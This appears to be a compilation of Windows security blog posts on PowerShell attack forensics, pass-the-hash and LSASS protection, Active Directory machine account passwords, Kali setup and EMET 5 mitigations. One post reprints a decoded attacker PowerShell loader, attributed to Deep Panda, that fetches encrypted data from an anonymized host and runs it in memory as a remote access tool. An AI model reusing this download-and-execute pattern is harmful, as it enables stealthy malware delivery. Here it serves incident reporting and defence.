Investigating PowerShell Attacks

PowerShell is a compelling method for attackers (and pentesters) since code is run in memory and there is no reason to touch disk (unlike executables, batch files, and vbscripts). Projects like PowerSploit and POSHSec prove that PowerShell is the future of attacks.

PowerShell Magazine has a great article on Investigating PowerShell Attacks:

Prior articles by Matthew Graeber, Joseph Bialek, and Will Schroeder did a great job of explaining why PowerShell is so dangerous in the hands of an attacker – particularly given elevated privileges during the post-exploitation phase of an incident. It provides:

  • A built-in mechanism for remote command execution
  • The ability to execute malicious code without ever touching disk
  • The ability to evade many Anti-Virus and Intrusion Prevention Systems
  • Full access to WMI and .NET Framework

The unauthorized use of PowerShell presents several challenges to forensic analysts and system administrators alike:

  • As a legitimate component of Windows, PowerShell execution does not necessarily indicate malicious behavior.
  • PowerShell 2.0 does not provide a practical mechanism for detailed (e.g. per-command) auditing. PowerShell 3.0 and later provides comprehensive module logging – but is only installed by default on Windows 8 or Server 2012, which remain uncommon in many corporate environments.
  • PowerShell remoting sessions occur in ephemeral process memory with few-to-no persistent artifacts.
  • Many system administrators and security professionals remain unfamiliar with PowerShell and its management or security controls.

Faced with these mounting challenges, we decided to research the forensic “footprints” left behind by the ways that an attacker might use PowerShell – a topic for which publicized information is scarce. Our work focused on three fundamental scenarios: local PowerShell execution, PowerShell remoting, and the configuration of a persistent PowerShell backdoor through the use of WMI. We examined multiple sources of evidence, including the registry, file system, event logs, process memory, and network traffic.

Read the rest of the article, Investigating PowerShell Attacks.


The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1

Pass-the-Hash has been around for years

The post on Alex Ionescu’s blog, The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1, describes the latest mitigation techniques Microsoft is incorporating in the latest versions of Windows.

He describes the importance of LSASS in his post:
(emphasis/bold text is my own)

The LSASS Process

In Windows, local user accounts are hashed using a well-known algorithm (NTLM) and stored in a database called the SAM (Security Accounts Manager), which is in itself a registry hive file. Just like with other operating systems, a variety of offline, and online attacks exist in order to obtain, reset, or otherwise reuse the hashes that are stored in the SAM, going from the usual “Password Reset” boot emergency disks, to malicious privilege escalation. Additionally, a variety of other cryptographic data is also stored in the SECURITY database, yet another registry hive file. This data includes information such as secrets, saved plain-text passwords, and more.

A process called the Local Security Authority (LSASS) manages the run-time state of this information, and is ultimately responsible for all logon operations (including remote logon over Active Directory). Therefore, in order to obtain access to this data, two primary mechanisms are used:

1) File-based attacks: the SAM/SECURITY hives are accessed, either offline, or online through tricks such as using Volume Shadow Copies, and the hashes + secrets extracted. This mechanism has disadvantages in that the storage formats can change, detailed registry knowledge is needed, and LSASS will often obfuscate much of the data (such as plain-text cached passwords).

2) Process-based attacks: since the hash and secret data from #1 above is neatly loaded by LSASS in readable form (and accessible thanks to easy-to-use query APIs), it is often much more preferable to simply inject code into the LSASS process itself, which is then used to dump hashes or secrets, as well as to create tokens based on those hashes. Additionally, researchers such as Gentil Kiwi have even discovered that LSASS contains plain-text passwords using reversible symmetric cryptography (with the key stored in the LSASS process itself). Tools now exist today to not only pass-the-hash, but to also pass-the-pass. In a default Windows 8 installation, both the local user account password, as well as the Microsoft Live Services password, is available in a plaintext-retrievable way.

Obviously, both this file and the process are protected such that only the SYSTEM account can access them. But once running as Administrator, this is a simple hurdle — and since most users still run as Administrators (albeit with UAC, but that’s not a security boundary), exploits only have to escape whatever local sandbox they’re running in, get admin rights, get a system token, and inject into LSASS. And of course, in a shared computer environment, another admin on the machine can get the passwords of all the users.

What’s changed in Windows 8.1? Run Mimikatz or other pass-the-hash attacks and they still work out-of-the-box. But on a Windows 8.1 RT system (supposing one can compile for ARM), they won’t — in fact, even attempting to attach a debugger to the LSASS process will fail, regardless of user-mode permissions.

The title of this blog post gives it away: in Windows 8.1 RT, LSASS is now a protected process light. And with Registry Editor and the right key/value pair, your Windows 8.1 installation (non-RT) can take advantage of this too.

Read the rest of Alex’s post here.


Hacking with PowerShell

Chinese hackers, aka “Deep Panda”, leverage PowerShell while compromising US think-tank computer systems.

Recently, we detected breaches of these networks via the use of powershell scripts deployed by the adversary as scheduled tasks on Windows machines. The scripts are passed to the powershell interpreter through the command line to avoid placement of extraneous files on the victim machine that could potentially trigger AV- or Indicator of Compromise (IOC)-based detection.

The script in the command line is base64 encoded, but when decoded it translates to the following code snippet:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

$wc = New-Object -TypeName System.Net.WebClient

$wc.Headers.Add(“Accept-Language”, “en-US,en;q=0.” + ([IntPtr]::Size – 1).ToString())

$wc.Headers.Add(“User-Agent”, “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)”)

$rndn = Get-Random

$wc.Headers.Add(“Cookie”, “p=” + $rndn)


$data = $wc.DownloadData(“https://<ANONYMIZED>/config/oauth/”)


[string[]]$xags = “https://<ANONYMIZED>/config/login/”, “WMITool.Program”, “Main”, “/f”, “ssh”, “/s”, “<ANONYMIZED>”, “/p”, “443”


$Passphrase = “<ANONYMIZED>”

$salts = “<ANONYMIZED>”

$r = new-Object System.Security.Cryptography.RijndaelManaged

$pass = [System.Text.Encoding]::UTF8.GetBytes($Passphrase)

$salt = [System.Text.Encoding]::UTF8.GetBytes($salts)


$r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, “SHA1″, 5).GetBytes(32) #256/8

$r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($rndn) )[0..15]


$d = $r.CreateDecryptor()

$ms = new-Object IO.MemoryStream @(,$data)

$cs = new-Object Security.Cryptography.CryptoStream $ms,$d,”Read”

$dfs = New-Object System.IO.Compression.GzipStream $cs, ([IO.Compression.CompressionMode]::Decompress)

$msout = New-Object System.IO.MemoryStream

[byte[]]$buffer = new-object byte[] 4096

[int]$count = 0



$count = $dfs.Read($buffer, 0, $buffer.Length)

$msout.Write($buffer, 0, $count)

} while ($count -gt 0)







[byte[]]$bin = $msout.ToArray()

$al = New-Object -TypeName System.Collections.ArrayList


$asm = [System.Reflection.Assembly]::Load($bin)

$asm.EntryPoint.Invoke($null, $al.ToArray())

sleep 5


Once executed, it downloads and executes from memory a .NET executable (typically named Wafer), which in turn typically downloads and runs MadHatter .NET Remote Access Tool (RAT), one of the favorites of DEEP PANDA. By running them from memory, it leaves no disk artifacts or host-based IOCs that can be identified in forensic analysis. This is typical for DEEP PANDA — stealth is their specialty and they prefer to operate in a way that leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time.

Read the article:
Deep in Thought: Chinese Targeting of National Security Think Tanks

Machine Account (AD Computer Object) Password Updates

There seems to be quite a bit of confusion when it comes to domain-joined computers and how/when they update their AD computer object (machine account) passwords.

Here are a few key points on this process:

  • The default domain policy setting configures domain-joined Windows 2000 (& up) computers to update their passwords every 30 days (default).
  • Computer password update policy is configured in the Default Domain Policy setting “Domain member: Maximum machine account password age” in “Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options”.  If the setting is “not defined”, the default of 30 days is set. The policy can be set to never, but this is not recommended.
  • Every computer joined to an AD domain has an associated computer account in AD and that account (object) has an associated password.
  • The computer password policy is more of a “guideline” than a rule – the computer updates the password when it thinks it needs to, but the domain doesn’t block computer accounts with passwords older than the policy setting.
  • Computer accounts (and associated passwords) don’t expire like user accounts and computer password updates are not forwarded to the PDC after the change is made on a DC (again, unlike with user account password changes).
  • AD Trust passwords follow this computer password policy setting.
  • The computer’s Netlogon service handles the machine account password updates, not Active Directory. When the computer boots up and the Netlogon service starts, it checks to see when the password was last set and when policy states it should be changed. The process sleeps until the computer is rebooted or until the password change date. At this point, the Netlogon process (Workstation Scavenger Thread) changes the computer’s AD account policy. If it can’t, the workstation scavenger thread sleeps for 15 minutes (by default – changed by modifying ScavengeInterval) and checks to see if a password update if required.
  • The computer account’s password is used to establish a secure session with an AD Domain Controller which is used for user authentication (as well as LocalSystem and NetworkService credentials).
  • The computer stores the machine account password in the registry location: HKLM\SECURITY\Policy\Secrets\$machine.ACC (encrypted secrets storage section of the registry).
  • The computer (and AD) stores the current password and the previous one (CurrVal and OldVal keys respectively, in the registry location above).
  • The password is stored in the computer account object in the unicodepwd (current password) and lmpwdHistory (previous password) attributes. The timestamp for this update is stored in the pwdlastset attribute in integer8 format.
  • The password is 120 characters (UTF16, or 240 bytes).
  • The computer checks for a valid secure channel to a DC, changes the password locally (in the registry), and then sends the password update to a Domain Controller. If the DC refuses the password change, the computer’s local password change is reverted.
  • If the computer is turned off for an extended period of time (weeks, months, etc) and is not turned on until the password is older than the computer password policy setting, the computer updates its password normally without issue (assuming there are no other extenuating circumstances with network connections to an available DC).
  • Since computer password updates occur over secure channel, if the computer has an existing secure channel session with a RODC (the RODC has the existing computer’s password in its AD database), the RODC forwards the change request to a writable DC. The RODC then attempts to replicate the password using ReplicateSingleObject (RSO).   If the computer’s password is not cached on the RODC (no secure session), the password change request follows the existing secure session the computer has with a writable DC.
  • The computer account has to have the password cached on the local RODC for the password change to be successful. Once the RODC updates its local database with the new computer account password, it replicates the updated password to a writable DC. If the password is not cached on the RODC (or is not allowed to be cached), the request is forwarded to the writable DC nearby (2008 or newer).
  • Managed Service Accounts introduced with Windows Server 2008 R2 are treated as computer accounts and update with the same frequency.
  • In a VDI environment, it may be necessary to configure the computer to not automatically update the computer password in AD (since the VDI infrastructure will manage these passwords). See Microsoft KB 327825 below for information.

NOTE: There will be an issue if the computer object is restored to a backup > 60 days since the computer will not have the older password saved locally (only the current and last password are kept).

Resetting (changing) a computer account password:

With Windows 2000 or Windows XP, you can also reset the machine account from within the graphical user interface (GUI). In the Active Directory Users and Computers MMC (DSA), you can right-click the computer object in the Computers or appropriate container and then click Reset Account. This resets the machine account. Resetting the password for domain controllers using this method is not allowed. Resetting a computer account breaks that computer’s connection to the domain and requires it to rejoin the domain.

When using the computer password last set attribute to identify inactive computers, I highly recommend you filter on the OS version (target workstations or servers, not both at the same time). Additionally, filter on the primary group ID to ensure that Domain Controllers are never affected – using PrimaryGroupID = 515 will guarantee a DC will never be selected.

Interesting Note: While you can’t disable a Domain Controller’s computer account through the GUI, specifically Active Directory Users & Computers, it is possible to disable a DC programatically, i.e. via PowerShell, so be careful.

Example PowerShell code to find inactive computers (workstations) in the domain:

Import-Module activedirectory
[int]$ComputerPasswordAgeDays = 90
IF ((test-path “c:\temp”) -eq $False) { md “c:\temp” }
$ExportFile = “c:\temp\InactiveWorkstations.csv”
$ComputerStaleDate = (Get-Date).AddDays(-$ComputerPasswordAgeDays)
$InactiveWorkstations = Get-ADComputer -filter { (passwordLastSet -le $ComputerStaleDate) -and (OperatingSystem -notlike “*Server*”) -and (OperatingSystem -like “*Windows*”) } -properties Name, DistinguishedName, OperatingSystem,OperatingSystemServicePack, passwordLastSet,LastLogonDate,Description
$InactiveWorkstations | export-csv $ExportFile

I recommend also combining this with the last time the Windows computer rebooted by checking LastLogonDate (AD Attribute LastLogonTimestamp).






PowerShell: Using Active Directory .Net methods in PowerShell Part 2

Powershell has the incredible ability to run some .Net methods natively.  Some of this data can also be gathered using AD commandlets. Read Part 1 for others.

Here are a few of my favorites.

Get a Computer’s Site:



Get a User’s Domain:



Get a Computer’s Domain:


List Active Directory FSMOs:



List All Domain Controllers in a Domain:


 Get Active Directory Domain Mode:


 Get Trusts for current Active Directory Domain:



Get Active Directory Forest Name:


Get a List of Sites in the Active Directory Forest:

[array] $ADSites = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites

Get Active Directory Forest Domains:


Get Active Directory Forest Global Catalogs:


Get Active Directory Forest Application Partitions:


Get Active Directory Forest Mode:


Get Active Directory Forest Root Domain:


Get Active Directory Forest Schema DN:


PowerShell Parameters

One of the most useful features in Powershell is Parameters.
Microsoft has some excellent documentation on Powershell Parameters

Some of my favorites:

Default Parameter

[Switch]$Enabled = $True

Mandatory Parameter


Validate Parameter Options in  a set

[ValidateSet("TCP", "UDP")]

Validate Parameter Options in a range (case INsensitive)


Add Parameter Aliases

[string] $NewPortScope


PowerShell: Drop (remove) the last character from a string

Drop (remove) the last character from a string:

$ComputerName = ‘DCCOMP01$’
$ComputerName = $ComputerName.Substring(0,$ComputerName.Length-1)

Result is “DCCOMP01″.
This works especially well when the last character is a special PowerShell reserved one like “$”.

Installing Kali Linux on Windows 8 Hyper-V

Installing Kali Linux on Windows 8 Hyper-V (Windows 8.1 includes improvements to the Hyper-V platform)

Installing Hyper-V:

  • Requirement: Windows 8 Pro or Windows 8 Enterprise which include Client Hyper-V.
  • Requirement: Your computer processor must support virtualization technology (VT), though most processors in the past 5 years support VT (pretty much all Intel i-series processors, i3, i5, i7).
  • Enable virtualization technology (VT) on your computer’s processor by editing the BIOS settings at boot-up (many computer BIOS have VT disabled).
  • Open the Start Screen, also referred to as Metro, (press the Windows Key) and search for “Windows Feature”. Open “Turn Windows Features on or off” and scroll down to “Hyper-V”.
  • Expand and Check the box next to Hyper-V. Ensure there is a check box. If there isn’t, visualization technology, you won’t be able to check the box and enable install of “Hyper-V Platform”.
  • Restart the computer when prompted.


Installing Kali Linux in a Hyper-V VM.

  • Ensure the latest version of Kali Linux ISO (Kali Linux 64 bit ISO) is on a local storage device (hard drive, USB drive, etc).
  • Open the Hyper-V Manager.
  • Create a new Virtual Switch by opening “Virtual Switch Manager” to enable VM networking.
  • On the right pane (Action), Click New, Virtual Machine.
  • Type a name for the VM (kali) and click Next.
  • Select “Generation 1” and click Next.
  • Either keep the default for Startup Memory (512MB) or change to 1024 (MB). Check Dynamic Memory if you want the Kali Linux VM to have access to additional memory when needed. Click Next.
  • Select the virtual NIC you created in the second step from the drop down list next to Connection. If you don’t have an option here, go back and configure a new virtual NIC. Click Next.
  • For the Virtual Hard Disk, select the default or change the size of the disk (127GB by default). It dynamically expands as needed, so make it as large as you think you will need. Click Next.
  • Select “Install an operating system from a bootable CD/DVD-ROM”, select “Image file (.iso)” and select Browse to select the Kali Linux ISO provided in step 1. Click Next.
  • Click Finish.
  • Double-Click on the new VM and click start. The Kali Linux installer should start. Select Install.
  • Follow the Kali Linux install prompts to install.


I have also had success with disabling all of the Integration services or running one of the Kali Live options.



Black Hat 2014 Talk on TSA System Insecurity: Pulling the Curtain on Airport Security

Billy Rios explains how security-focused agencies keep making the same mistakes – this time it’s the TSA.

Some of the issues identified in the talk:

  • Network cable connections easily accessible by the public
  • Hardcoded passwords in body scanner systems (which run Windows 98/WinXP)
  • Accounts are stored in a config file.
  • Network services enabled.(with hardcoded passwords)

Read the full presentation here: Pulling the Curtain on Airport Security (slides)

Microsoft Enhanced Mitigation Experience Toolkit (EMET) 5 Protection Methods

Microsoft Enhanced Mitigation Experience Toolkit (EMET) v5 security technology which I outlined in a previous post has several protection methods which will be detailed here. According to my sources at Microsoft 😉, EMET can be installed on workstations and servers (testing is always highly recommended before placing in production). Given the tremendous security improvements when installed, it is recommended for all Windows systems on the network.

Other EMET Comments:

It’s a good thing that EMET v5 is out now since several of the protections in EMET v4 have been bypassed.

The 4 recommendations from the Bromium whitepaper (Bypassing EMET 4.1):

  1. Hook NtProtectVirtualMemory by default.
  2. Create a new EAF protection scheme.
  3. Check more than one CALL deep to see if code was RETed into.
  4. Expand the ROP mitigations to cover 64 bit code.

It seems like Microsoft has incorporated fixes in EMET 5 to mitigate the issues discovered with version 4.1.

EMET 5 Improvements Overview:

Attack Surface Reduction (ASR)
The ASR is a mechanism to block the usage of a specific modules or plug-ins within an application. For example, you can configure EMET 5.0 to prevent Microsoft Word from loading the Adobe Flash Player plug-in, or, with the support of security zones, you can use EMET 5.0 to prevent Internet Explorer from loading the Java plug-in on an Internet Zone website while continuing to allow Java on Intranet Zone websites.

During the preview period we have performed several tests and collected your feedback to finalize the default configuration for this mitigation. We aimed at having a configuration that provided security, and at the same time, did not limit the user experience with the applications protected by EMET 5.0. By default, EMET 5.0 is configured to block some modules and plug-ins from being loaded by Internet Explorer while navigating to websites belonging to the Internet Zone, and to also block the Adobe Flash plug-in from being loaded by Microsoft Word, Excel, and PowerPoint. We have chosen modules that are commonly used in certain exploitation scenarios, but like all EMET features and mitigations, the ASR is completely configurable to satisfy everybody’s needs and to be tailored to specific systems’ requirements.

Export Address Table Filtering Plus (EAF+)
The EAF+ starts by the same concept as the existing Export Address Table Filtering (EAF) mitigation, but it amplifies its scope and robustness. During the Technical Preview, we have presented the EAF+ as an extension to the EAF. During the last couple of months we have made several improvements to it, and we decided that it should be a new mitigation on its own.

As already mentioned in the Technical Preview blog post, when EAF+ is enabled it adds the following additional safeguards:

  • Perform additional integrity checks on stack registers and stack limits when export tables are read from certain lower-level modules
  • Prevent memory read operations on the PE header, sections, import/export table pointers of selected modules when they originate from suspicious code that may reveal memory corruption bugs used as “read primitives” for memory probing

These improvements help detect and disrupt some current techniques used to dynamically discover ROP (Return Oriented Programming) gadgets and reliably execute code when a vulnerability is exploited.

64-bit Return Oriented Processing (ROP) mitigations
Many ROP mitigations are now available also for 64-bit processes: Deep Hooks, Stack Pivot, Load Library, and MemProt. Although we have not yet detected exploits that use ROP techniques to exploit 64-bit applications, we decided to extend the anti-ROP mitigations to this architecture to be ready when the time comes.

Strict checks for Certificate Trust rules
The Certificate Trust’s pinning rules can now be configured with a more aggressive “blocking” mode (not enabled by default), so that EMET 5.0 can force Internet Explorer to terminate the SSL connection without sending session data instead of just detecting the untrusted certificate.

EMET Service
We have added a new service, called EMET Service, which is taking in charge many duties that EMET Agent used to do in previous versions. The EMET Service, among other things, takes care of evaluating the Certificate Trust rules, appropriately dispatching EMET Agents in every user’s instance, and automatically applying Group Policy settings pushed through the network. Also, a service offers more resiliency and better ability to being monitored.

Hardening and better application compatibility
We have seen a technique to potentially bypass some of the EMET 4 mitigations. This technique is possible when a memory corruption within an EMET-protected application can be abused to overwrite selected memory areas and corrupt data belonging to EMET itself. We have also seen techniques aiming at disabling the EAF mitigation by invoking some specific API calls. In EMET 5.0 we worked to harden against potential bypass techniques.
We also refactored many components of the EMET 5.0 engine, in order to maximize application compatibility, also with some popular anti-malware products, and reduce potential false-positives.


The first screenshot includes the following protection methods:

In a previous blog post series we went into detail on what DEP is and how it works[part 1, part 2].  In summary, the purpose of DEP is to prevent attackers from being able to execute data as if it were code.  This stops an attacker from being able to directly execute code from the stack, heap, and other non-code memory regions.  As such, exploitation techniques like heap spraying (of shellcode) or returning into the stack are not immediately possible.

The effectiveness of DEP hinges on the attacker not being able to 1) leverage code that is already executable or 2) make the attacker’s data become executable (and thus appear to be code).  On platforms without ASLR (that is, versions of Windows prior to Windows Vista), it is often straightforward for an attacker to find and leverage code that exists in modules (DLLs and EXEs) that have been loaded at predictable locations in the address space of a process.  Return-oriented programming (ROP) is perhaps the most extensive example of how an attacker can use code from loaded modules in place of (or as a stepping stone to) their shellcode [3,1].  In addition to loaded modules, certain facilities (such as Just-In-Time compilers) can allow an attacker to generate executable code with partially controlled content which enables them to embed shellcode in otherwise legitimate instruction streams (“JIT spraying”)[2].

The fact that modules load at predictable addresses without ASLR also makes it possible to turn the attacker’s data into executable code.  There are a variety of ways in which this can be accomplished, but the basic approach is to use code from loaded modules to invoke system functions like VirtualAlloc or VirtualProtect which can be used to make the attacker’s data become executable.

Summary: DEP breaks exploitation techniques that attackers have traditionally relied upon, but DEP without ASLR is not robust enough to prevent arbitrary code execution in most cases.
Source: Microsoft Security Research and Defense Blog

This mitigation performs Structured Exception Handler (SEH) chain validation and breaks SEH overwrite exploitation techniques.  Take a look at the following SRD blog post for more information on what these exploits are and how they are blocked. View post here. [Implemented in Windows since Windows Vista SP1]
Source: What’s EMET and How Can You Benefit (Windows Blog)

  • Null Page Protection

    This blocks attackers from being able to take advantage of NULL dereferences in user mode.  It functions by allocating the first page of memory before the program starts.
    Source: What’s EMET and How Can You Benefit (Windows Blog)

  • Heap Spray Protection

    Heap spraying is an attack technique that involves filling a process’ heap with specially crafted content to aid in exploitation.  Right now, many attackers rely on their content being placed at a common set of memory addresses.  This mitigation is designed to pre-allocate those memory addresses and thus block these common attacks.  Please note that it only aims to break current exploit that take advantage of these common addresses.  It is not a general mitigation for the larger heap spraying attack.  That said, if attackers do change the addresses they use, EMET users can change the addresses that are blocked.
    Source: What’s EMET and How Can You Benefit (Windows Blog)

  • Export Address Table Access Filtering

    In order to do something useful an exploit generally needs to call functions exposed by Windows. However, in order to call one of these functions, the exploit must first find where it is loaded. This mitigation blocks the most common approach used by exploits to look up the location of a function which involves scanning the export address table of loaded libraries. It is highly effective at blocking exploits currently being used.
    Source: What’s EMET and How Can You Benefit (Windows Blog)

  • Mandatory Address Space Layout Randomization

    ASLR randomizes the addresses where modules are loaded to help prevent an attacker from leveraging data at predictable locations. The problem with this is that all modules have to use a compile time flag to opt into this. Mandatory ASLR forces all modules to be loaded at randomized addresses regardless of what flags they were compiled with. Exploits relying on data at fixed addresses will fail.
    Source: What’s EMET and How Can You Benefit (Windows Blog)

  •  Attack Surface Reduction

    The Attack Surface Reduction (ASR) helps reduce the exposure of applications at risk for attacks by blocking the usage of specific modules or plugins within the target application. For example, EMET can be configured to prevent Microsoft Word from loading the Adobe Flash plugin, or, with the support of Security Zones, can be configured to prevent Internet Explorer from loading the Oracle Java plugin on a website in the Internet Zone while continuing to allow Java on Intranet Zone websites. The mechanism simply prevents DLL loading on a per-process base, and it essentially adds the benefit to “killbit” specific modules in specific applications.
    Source: Enhanced Mitigation Experience Toolkit 5.0 User Guide [PDF]

Additional mitigations:

  • Advanced Mitigations for ROP

EMET offers additional mitigation options that apply to all configured software. The currently available additional mitigations are related to the ROP mitigations, and when enabled or disabled they affects all the programs that have any of the ROP mitigations configured.

Following is a summary of what these advanced mitigations are:

Requires ROP
Deep hooks: EMET protects critical APIs and the subsequent lower level APIs used by the top level critical API. For example, EMET not only hooks and protects kernel32!VirtualAlloc but also the related lower level functions, kernelbase!VirtualAlloc and ntdll!NtAllocateVirtualMemory.

Anti detours: Some exploits attempt to evade the hooks by executing a copy of the hooked function prologue and then jump to the function past the prologue. With “Anti detours” option enabled, common shellcode using this technique are not effective.

Banned functions: By enabling this option, additional APIs, configured in a list, will be blocked when used. In this version only ntdll!LdrHotPatchRoutine is configured to mitigate potential exploits abusing this API.

Source: Enhanced Mitigation Experience Toolkit 5.0 User Guide [PDF]

EMET logs to the Application Event Log in Windows for activity review.